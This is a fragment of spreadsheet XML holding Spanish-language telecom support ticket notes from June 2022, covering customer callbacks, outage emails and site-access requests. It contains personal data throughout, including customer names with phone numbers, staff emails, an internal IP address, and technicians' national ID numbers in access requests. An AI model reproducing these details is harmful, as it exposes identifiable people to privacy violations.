PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI INMACULADA ID: CONTR0001801808OC
HOLA,
ESTOY CONFIRMANDO QUE ALCANZAMOS LOS 3MBPS
ANTES:
+FAVOR DEJAR EN MONITEO HASTA LAS 10 AM
SLDS!
GT</t>
  </si>
  <si>
    <t>F4605056</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR DANI RUIZ 52933268 ID: 3001801537 INDICA QUE EL SERVICIO DE INTERNET YA SE ENCUENTRA FUNCIONANDO CORRECTAMENTE DESDE AYER, CON LO QUE PRESENTA PROBLEMA ES CON EL SERVICIO DE LLAMADAS 22696834, SE GENERA TICKET SD1136039/F4605611*/*/*
--SE SOLICITA A CNOC PROCEDER AL CIERRE--</t>
  </si>
  <si>
    <t>SE LLAMA A PR  ORLANDO JETELLA 37586407 SE TRATA DE DEJAR EN CONFERENCIA CON GESTOR PERO CLIENTE DEJA EN ESPERA Y YA NO RETOMA LA LLAMADA
-ID 3001767661</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LESTER IVAN KROLIK MORALES AL 30389449 NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001695266
**</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE
DE: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 11:42
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; MARLON ESTUARDO RAMOS &lt;RAMOS.MARLON@CLARO.COM.GT&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: C193 - LENTITUD ENLACES DE DATOS ID 625900216 / 38300649 E INTERNET 625900163
BUEN DÍA,  GRACIAS SOFIA FAVOR CONTACTAR A ORLANDO JETELLA AL37586407 / 22696834.
SALUDOS,
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER RESYES 45787911 MENCIONA QUE ENVIO POR CORREO OTRO CONTACTO
-ID 3001766249</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LESTER IVAN KROLIK MORALES 30389449  PERO NO RESPONDE
-ID 3001765736</t>
  </si>
  <si>
    <t>F4605094</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE YA REINICIARON LA PBX Y LOS EQUIPOS DE CLARO EL DIA DE AYER, COMENTA QUE NO HAN TENIDO PROBLEMAS EN LA ENERGIA DE LAS INSTALACIONES, EL DIA DE AYER EN LA MAÑANA ESTUVO FUNCIONANDO PERO DESPUES DE LAS 10 AM YA NO FUNCIONO, SE LE IDNICA AL CLIENTE QUE ACTUALMENTE EL SERVICIO ESTA ACTIVO PERO QUE SE ENVIARA PERSONAL TECNICO A CERTIFICAR PARA VALIDAR SI NO SE TIENE PROBLEMAS HACIA LA PBX, CLIENTE ESTA DE ACUERDO E INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE PEDRO SÁNCHEZ - JORGE 78440347 - 78524039 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4605116</t>
  </si>
  <si>
    <t>INFORMA CLIENTE DAVID PAZ 59307613 QUE NO GENERA NI RECIBE LLAMADAS, CLIENTE INDICA QUE YA VERIFICÓ Y REINICIÓ LA PBX CON SU PROVEEDOR Y NO VE INCONVENIENTE.
ID: 3001703416</t>
  </si>
  <si>
    <t>F4605118</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 506 71114951 CONTESTA EL SEÑO MAYCOL QUIEN CONFIRMA QUE EL SERVICIO ESTA YA ESTABLE QUE EL PROBLEMA ERA POR ENERGIA Y CON 1 UPS PERO QUE REALIZO CAMBIO DE CONECTORES Y ESTA VERIFICANDO INTERNAMENTE**
-ID 3001721106
**</t>
  </si>
  <si>
    <t>F4605161</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAVIER GOMEZ 47409087 MENCIONA QUE PERSISTE EL INCONVENIENTE CON EL INTERNET
SE LE MENCIONA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO BIEN PERO CLIENTE NO DEJA EXPLICAR
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001711088</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YASMIN 54197370 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001709616 - 3001709946</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 9:18
PARA: JDEGOMEZ@POPS.COM.GT &lt;JDEGOMEZ@POPS.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: DISTRIBUIDORA POPS S.A. || 397200041T || SD1135738
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
-SE CUENTA CON EQUIPOS ASOCIADOS
-SE CUENTA CON SALIDA A INTERNET
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4605181</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  HAIRO  VELASQUEZ 46051665 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001734509</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  HAIRO VELASQUEZ 46051665 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001722326
**</t>
  </si>
  <si>
    <t>F4605183</t>
  </si>
  <si>
    <t>**SE LLAMO NUEVAMENTE  A CLIENTE JUSTO OROZCO AL 51259264 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001722913
**</t>
  </si>
  <si>
    <t>F4605184</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. SELVIN FUENTES AL 49872286 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001723650
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEILVIN FUENTES 49872286 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001133083
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SEILVIN FUENTES 49872286 PERO NO RESPONDE, SE INTENTARA LUEGO**
-ID 1001179627
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SEILVIN FUENTES 49872286 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001169735</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  24119191 EXT 10582 PERO NO RESPONDE, SE INTENTARA LUEGO**
-ID 3001792287
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. SELVIN FUENTS 49872286 NO CONTESTO IVR ENVIA A BUZON, ID: 3001716632</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 49872286 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001841222
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  BRYAN ALBIZUREZ 24119191 EXT 10582 INDICA QUE SOLO EL NUMERO DEL SEÑOR SEILVIN FUENTES 49872286 TIENE QUE SE LE SIGA LLAMANDO**
-ID 3001840203
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  24119191 EXT 10582 PERO NO RESPONDE, SE INTENTARA LUEGO**
-ID 3001784809
**</t>
  </si>
  <si>
    <t>**SE LLAMA A LA CENTRAL BRYAN ALBIZUREZ 52025829 PERO NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001774237
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  24119191 EXT 10582 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001778454</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52025829 PERO SIGUE SIN RESPONDER
-ID 3001778217</t>
  </si>
  <si>
    <t>**SE LLAMA A LA CENTRAL BRYAN ALBIZUREZ 52025829 PERO NO RESPONDE | ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001757123
**</t>
  </si>
  <si>
    <t>SE LLAMA A LA CENTRAL BRYAN ALBIZUREZ 52025829 PERO NO RESPONDE
-ID 3001736359 - 3001736517</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SEILVIN FUENTES 49872286 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001735680</t>
  </si>
  <si>
    <t>F4605185</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JULIO LOPEZ QUIEN VALIDA EL SERVICIO Y AUTORIZA EL CIERRE.
3001811643
COLA:
NOMBRE: A: 55874834
NÚMERO: 55874834
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 55874834
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/06/2022 14:16:25</t>
  </si>
  <si>
    <t>F4605186</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE RICARDO FUENTES 58599946 INDICA QUE NO CUENTAN CON ENERGIA EN EL SITIO **
-ID 3001724176
**</t>
  </si>
  <si>
    <t>F4605191</t>
  </si>
  <si>
    <t>SE GESTIONA ACCESOS
DE: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 10:12
PARA: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTION DE ACCESOS F4605191| 8901721T |CC_BANRURAL_GT_AGENCIA_0654 | REDUNDANCIA WIMAX.- 6A. CALLE 3-58, CANTON LAS FLORES, SAN VICENTE PACAYA ECUINTLA
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4605191| 8901721T |CC_BANRURAL_GT_AGENCIA_0654 | REDUNDANCIA WIMAX.- 6A. CALLE 3-58, CANTON LAS FLORES, SAN VICENTE PACAYA ECUINTLA
AGRADECEMOS GESTIONAR ACCESO SÁBADO 18/06/2022  A LA 09:00
TÉCNICOS:
JUAN PABLO GONZALEZ GARCIA                   DPI     2260509981308
DONALD FERNANDO MAYORGA CASTILLO  DPI     2256091261301
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4605192</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CAROLINA HERNANDEZ 53096508 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001731156</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA CAROLINA HERNANDEZ-53096508 ##   SE LE EXPLICA QUE LA  PBX ESTA LIBERANDO LLAMADAS ### CLIENTE REALIZARA RESET A PBX Y  PIDE SE LE MARQUE EN 30 MINUTOS/1 HORA ##
PBX LIBERA LLAMADAS
3001712625
COLA:
NOMBRE: A: 53096508
NÚMERO: 53096508
DURACIÓN: 0:02:42
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 53096508
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 17/06/2022 09:07:54</t>
  </si>
  <si>
    <t>F4605204</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON GOMEZ-59362053 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001795391</t>
  </si>
  <si>
    <t>BYRON GOMEZ-59362053  BRINDA CORREO PARA TRAMITAR PERMISOS
HORARIO:
LUNES A VIERNES 7AM A 4PM
BGOMEZ@LAUNION.COM.GT
SOPORTE@LAUNION.COM.GT
3001731344
COLA:
NOMBRE: A: 59362053
NÚMERO: 59362053
DURACIÓN: 0:03:02
ESTADO: CONECTADA
DETALLES: 59362053
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 17/06/2022 10:04:10</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE PERMISOS ##
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 10:22
PARA: BGOMEZ@LAUNION.COM.GT &lt;BGOMEZ@LAUNION.COM.GT&gt;; SOPORTE@LAUNION.COM.GT &lt;SOPORTE@LAUNION.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GDN 77401500 Y 78791717 || INGENIO LA UNION
BUEN DÍA ESTIMADO, REFERENTE A LOS E1'S:
GDN 77401500 Y 78791717
INGENIO LA UNION
FINCA BELEN, SANTA LUCIA COTZUMALGUAPA
SOLICITO SU AMABLE APOYO PARA EL TRAMITE DE PERMISOS HACIA NUESTROS TÉCNICOS QUE ESTARÁN LLEGANDO EL DÍA DE HOY A SUS INSTALACIONES PARA REVISAR EL SERVICIO TELEFÓNICO.
NOMBRE:                DPI
LUIS GUILLERMO ALVARADO BERLUIZ 1913924050101
OMAR JOSUE LOPEZ SAENZ 2090984220301
QUEDAMOS ATENTOS A SUS COMENTARIOS, FAVOR CONFIRMAR PERMISOS POR ESTE MEDIO,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>CLIENTE AUTORIZA PERMISOS ## SE APERTURA WO
DE: BASEDEMONITOREO &lt;BASEDEMONITOREO@LAUNION.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 10:40
PARA: SOPORTE &lt;SOPORTE@LAUNION.COM.GT&gt;; MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GARITA 7 &lt;GARITA7@LAUNION.COM.GT&gt;; GARITA 4 &lt;GARITA4@LAUNION.COM.GT&gt;
CC: PAVEL DANILO MONTENEGRO ESTRADA &lt;PMONTENEGRO@LAUNION.COM.GT&gt;; EDUARDO ARDON DE LA ROCA &lt;EARDON@LAUNION.COM.GT&gt;; SEGURIDAD FÁBRICA &lt;SEGURIDADFABRICA@LAUNION.COM.GT&gt;
ASUNTO: RE: GDN 77401500 Y 78791717 || INGENIO LA UNION
BUEN DÍA.
MUY BIEN.
SE ESTARÁ DANDO EL INGRESO A LAS INSTALACIONES.
SALUDOS,BENDICIONES!!!
GUSTAVO ORDOÑEZ
OPERADOR DE SEGURIDAD ÁREA ELECTRÓNICA.
É DIRECTO: 7740-1597
É EXTENSIÓN: 1597
* BASEDEMONITOREO@LAUNION.COM.GT
ESTA COMUNICACIÓN Y SUS ANEXOS CONTIENEN INFORMACIÓN CONSIDERADA PRIVILEGIADA Y CONFIDENCIAL PARA EL USO EXCLUSIVO DEL DESTINATARIO. LA DISTRIBUCIÓN, COPIA O USO POR TERCERAS PERSONAS ESTÁ ESTRICTAMENTE PROHIBIDA. SI ESTA COMUNICACIÓN NO ESTÁ DIRIGIDA A USTED, POR FAVOR ELIMINE EL MENSAJE.
NECESITA IMPRIMIR ESTE E-MAIL? 3 ASHORE PAPAL.
DE: SOPORTE &lt;SOPORTE@LAUNION.COM.GT&gt;
ENVIADO EL: VIERNES, 17 DE JUNIO DE 2022 10:37
PARA: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GARITA 7 &lt;GARITA7@LAUNION.COM.GT&gt;; GARITA 4 &lt;GARITA4@LAUNION.COM.GT&gt;; BASEDEMONITOREO &lt;BASEDEMONITOREO@LAUNION.COM.GT&gt;
ASUNTO: RE: GDN 77401500 Y 78791717 || INGENIO LA UNION
BUENOS DÍAS
@BASEDEMONITOREO @GARITA 4@GARITA 7 SI FUERAN TAN AMABLES DE PERMITIRLE EL INGRESO AL PERSONAL DE CLARO, VIENEN A REVISAR UN INCONVENIENTE CON LAS LÍNEAS TELEFÓNICAS,
            MUY AGRADECIDOS DESDE YA POR EL APOYO ACOSTUMBRADO,
ATENTAMENTE:</t>
  </si>
  <si>
    <t>F4605212</t>
  </si>
  <si>
    <t>CLIENTE JONATHAN GARCÍA 44320454 REALIZA PRUEBAS Y VALIDA EL E1 OPERATIVO, AUTORIZA EL CIERRE DEL CASO. 3001722519</t>
  </si>
  <si>
    <t>CLIENTE JONATHAN GARCÍA 44320454 INDICA QUE YA VE EL E1 ACTIVO, SOLICITA SE LE LLAME EN 15 MINUTOS PARA VALIDAR. ID: 3001715480</t>
  </si>
  <si>
    <t>F4605216</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE GUILLEN 95677614 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001783517</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE GUILLEN 95677614 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001739971</t>
  </si>
  <si>
    <t>F4605235</t>
  </si>
  <si>
    <t>SERVICIO SE ENCUENTRA ACTIVO, SE PROCEDE A CONTACTAR AL CLIENTE PARA CONFIRMAR QUE ES LO QUE ESTA REPORTANDO O SI EL PROBLEMA ES CON OTRO GDN</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL SERVICIO LE ESTA FUNCIONANDO SIN EMBARGO INDICA QUE ESTUVO CAIDO POR UNOS MINUTOS, SOLICITA QUE SE VALIDE A MEDIO DIA MIENTRAS REALIZA MAS PRUEBAS.
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE OSCAR ROSALES 58588140
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  OSCAR ROSALES 58588140 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001771882</t>
  </si>
  <si>
    <t>F4605237</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE OSCAR ROSALES 58588140 CLIENTE INDICA QUE EL SERVICIO LE ESTA FUNCIONANDO SIN EMBARGO INDICA QUE ESTUVO CAIDO POR UNOS MINUTOS, SOLICITA QUE SE VALIDE A MEDIO DIA MIENTRAS REALIZA MAS PRUEBAS.
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4605248</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DOUGLAS ALEGRIA AL 59229650 SOLICITA QUE SE LE LLAME EN 10 MIN YA QUE NO ESTA EN OFICINA**
-ID 3001739615
**</t>
  </si>
  <si>
    <t>F4605262</t>
  </si>
  <si>
    <t>SE LLAMAA  A CLIENTE  JUAQUIN ESCOBAR-41820623 ## QUIEN INDICA QUE SOLO APLICARION REINICIO A ASMI Y SERVICIO RESTABLECEIO ##VALIDA CIERRE
3001724861
COLA:
NOMBRE: A: 41820623
NÚMERO: 41820623
DURACIÓN: 0:01:47
ESTADO: CONECTADA
DETALLES: 41820623
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 17/06/2022 09:43:23</t>
  </si>
  <si>
    <t>F4605275</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JESMAGE 84139250 PARA SOLICITAR DATOS DE VISITA
-ID 3001733816
NOMBRE DEL CLIENTE: CORTE SUPREMA DE JUSTICIA-
UBICACIÓN:CARRETERA A LAMLAYA, CONTIGUO A LA MISIÓN BAUTISTA
CONTACTO EN SITIO: JESMAGE 84139250
HORARIO DE ATENCION:8:00 - 13:00
GESTIÓN DE PERMISOS:UNICAMENTE CUANDO ESTEN EN PR CONTACTARSE CON JESMAGE 84139250</t>
  </si>
  <si>
    <t>F4605284</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILLERMO HERNANDEZ 85776372 MENCIONA QUE NO SE ENCUENTRA LA ENCARGADA EN PR POR LO QUE SOLICITA LLAMDA A LAS 14:30
-ID 3001747370</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILLERMO HERNANDEZ 85776372 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001817232</t>
  </si>
  <si>
    <t>F4605326</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OTTO GALINDO 47686729 MENCIONA QUE LAS LLAMADAS SE ESTABAN CORTANDO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001749337</t>
  </si>
  <si>
    <t>F4605327</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DEL RFO, LA SOLICITUD SE HIZO HOY, EN ESPERA DE LAS 48/72 HORAS HÁBILES, SE ESPERA TENERLO LA PRÓXIMA SEMANA:
ASUNTO: RV: REPORTE DE FALLA E1 2279-9100 (TELEFÓNICA) DC-DR</t>
  </si>
  <si>
    <t>F4605335</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE JUAN MANUEL BAUTISTA 30639811  MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001753527 - 3001753727</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JUAN MANUEL BAUTISTA 30639811 ACTUALMENTE EN LLAMDA, PROCEDE A UBICAR LOS EQUIPOS DE CLARO ....</t>
  </si>
  <si>
    <t>F4605338</t>
  </si>
  <si>
    <t>F4605338 || CC_BANRURAL_GT_AGENCIA_0339
ESTIMADO CLIENTE
   DANDO SEGUIMIENTO A FALLA ABIERTA PROACTIVAMENTE: F4605338, DE LA AGENCIA:
CC_BANRURAL_GT_AGENCIA_0339, EN: 5 AVENIDA 9-95 ZONA 1 CONTRALORIA DE CUENTAS, NECESITAMOS CERTIFICAR EL COBRE, POR CAÍDAS EN EL MISMOS, SOLICITAMOS SU APOYO EN COORDINAR Y AUTORIZAR EL ACCESO A NUESTRO PERSONAL EL DÍA LUNE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AGRADECEMOS SU APOYO Y CONFIRMACIÓN.
SALUDOS</t>
  </si>
  <si>
    <t>F4605349</t>
  </si>
  <si>
    <t>SE VALIDA QUE PUERTO WAN EN EQUIPO TELDAT SE ENCUENTRA EN ESTADO DOWN, SE VALIDA RESPUESTA DE PERSONAL DE TAVSA, INDICAN QUE SE RETIRO UPS EN MAL ESTADO Y QUE ESTARAN NOTIFICANDO CUANDO SEA REPARADO PARA ENERGIZAR LOS EQUIPOS CORRECTAMENTE. ATM LO DEJAN OPERATIVO POR 3G.
ETHERNET0/1	WAN PRINCIPAL/_/47502553T/_/
10.174.76.156 / 255.255.255.128	UP	DOWN	0.00	0.00	1 GBPS
DE: OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;
ENVIADO: VIERNES, 17 DE JUNIO DE 2022 14:57
PARA: MARVIN TOC &lt;MTOC@5B.COM.GT&gt;; ERWIN RAMIREZ &lt;ERWIN.RAMIREZ@TAV.COM.GT&gt;; JUAN GONZALEZ &lt;JUAN.GONZALEZ@TAV.COM.GT&gt;; JULIO ALVA &lt;JULIO.ALVA@TAV.COM.GT&gt;; OPERADORES ATM 2 &lt;OPERADORES.ATM2@TAV.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; OPERADORES ATM 1 &lt;OPERADORES.ATM1@TAV.COM.GT&gt;; OSCAR CASTILLO &lt;OSCAR.CASTILLO@TAV.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WILLIAM GABRIEL SANAVRIA &lt;WILLIAM.SANAVRIA@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;
ASUNTO: RE: FALLAS DE ENLACE PRINCIPAL ALARMADO CC_TYT_GT_ATM3998
BUEN DÍA ESTIMADOS:
SE INFORMA QUE EL ATM ESTÁ TRABAJANDO CON EQUIPO 3G YA QUE SE PROCEDIÓ A RETIRAR EL UPS POR BATERÍAS EN MAL ESTADO Y SE ESTARÁ INFORMANDO CUANDO EL MISMO SEA INSTALADO PARA PROCEDER A CONECTAR LOS EQUIPOS DE COMUNICACIÓN CORRECTAMENTE.
¿¿¿¿
SALUDOS,</t>
  </si>
  <si>
    <t>SE CONSULTA A PERSONAL DE 5B, HECTOR ATIENDE LLAMADA, PARA VALIDAR SI SE TIENE TIEMPO ESTIMADO PARA LA REPARACION DE LA BATERIA DEL UPS, PERO NO CUENTAN CON UN ESTIMADO, POR LO QUE SE TENDRA TICKET EN ETAPA PENDIENTE CLIENTE.    ||    SE VALIDA QUE PUERTO WAN EN EQUIPO TELDAT SE ENCUENTRA EN ESTADO DOWN, SE VALIDA RESPUESTA DE PERSONAL DE TAVSA, INDICAN QUE SE RETIRO UPS EN MAL ESTADO Y QUE ESTARAN NOTIFICANDO CUANDO SEA REPARADO PARA ENERGIZAR LOS EQUIPOS CORRECTAMENTE. ATM LO DEJAN OPERATIVO POR 3G.
ID
1001005434
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:04:56
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 18/06/2022 18:04:49</t>
  </si>
  <si>
    <t>SE LLAMA A ERWIN CHOQUIN 42343886 PARA VALIDAR SI YA SE TIENE ALGUNA FECHA ESTIMADA PARA INSTALAR EL UPS , NO RESPONDE LLAMADA.
*-*
SE CONSULTA A PERSONAL DE 5B, HECTOR ATIENDE LLAMADA, PARA VALIDAR SI SE TIENE TIEMPO ESTIMADO PARA LA REPARACION DE LA BATERIA DEL UPS, PERO NO CUENTAN CON UN ESTIMADO, POR LO QUE SE TENDRA TICKET EN ETAPA PENDIENTE CLIENTE.    ||    SE VALIDA QUE PUERTO WAN EN EQUIPO TELDAT SE ENCUENTRA EN ESTADO DOWN, SE VALIDA RESPUESTA DE PERSONAL DE TAVSA, INDICAN QUE SE RETIRO UPS EN MAL ESTADO Y QUE ESTARAN NOTIFICANDO CUANDO SEA REPARADO PARA ENERGIZAR LOS EQUIPOS CORRECTAMENTE. ATM LO DEJAN OPERATIVO POR 3G.
*-*
ID
1001732815
COLA:
NOMBRE: A: 42343886
NÚMERO: 42343886
DURACIÓN: 0:00:36
ESTADO: CONECTADA
DETALLES: 42343886
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 22/06/2022 16:47:14</t>
  </si>
  <si>
    <t>F4605353</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN COMPLETA LA LLAMADA
#3LLAMADA DESDE VIVO</t>
  </si>
  <si>
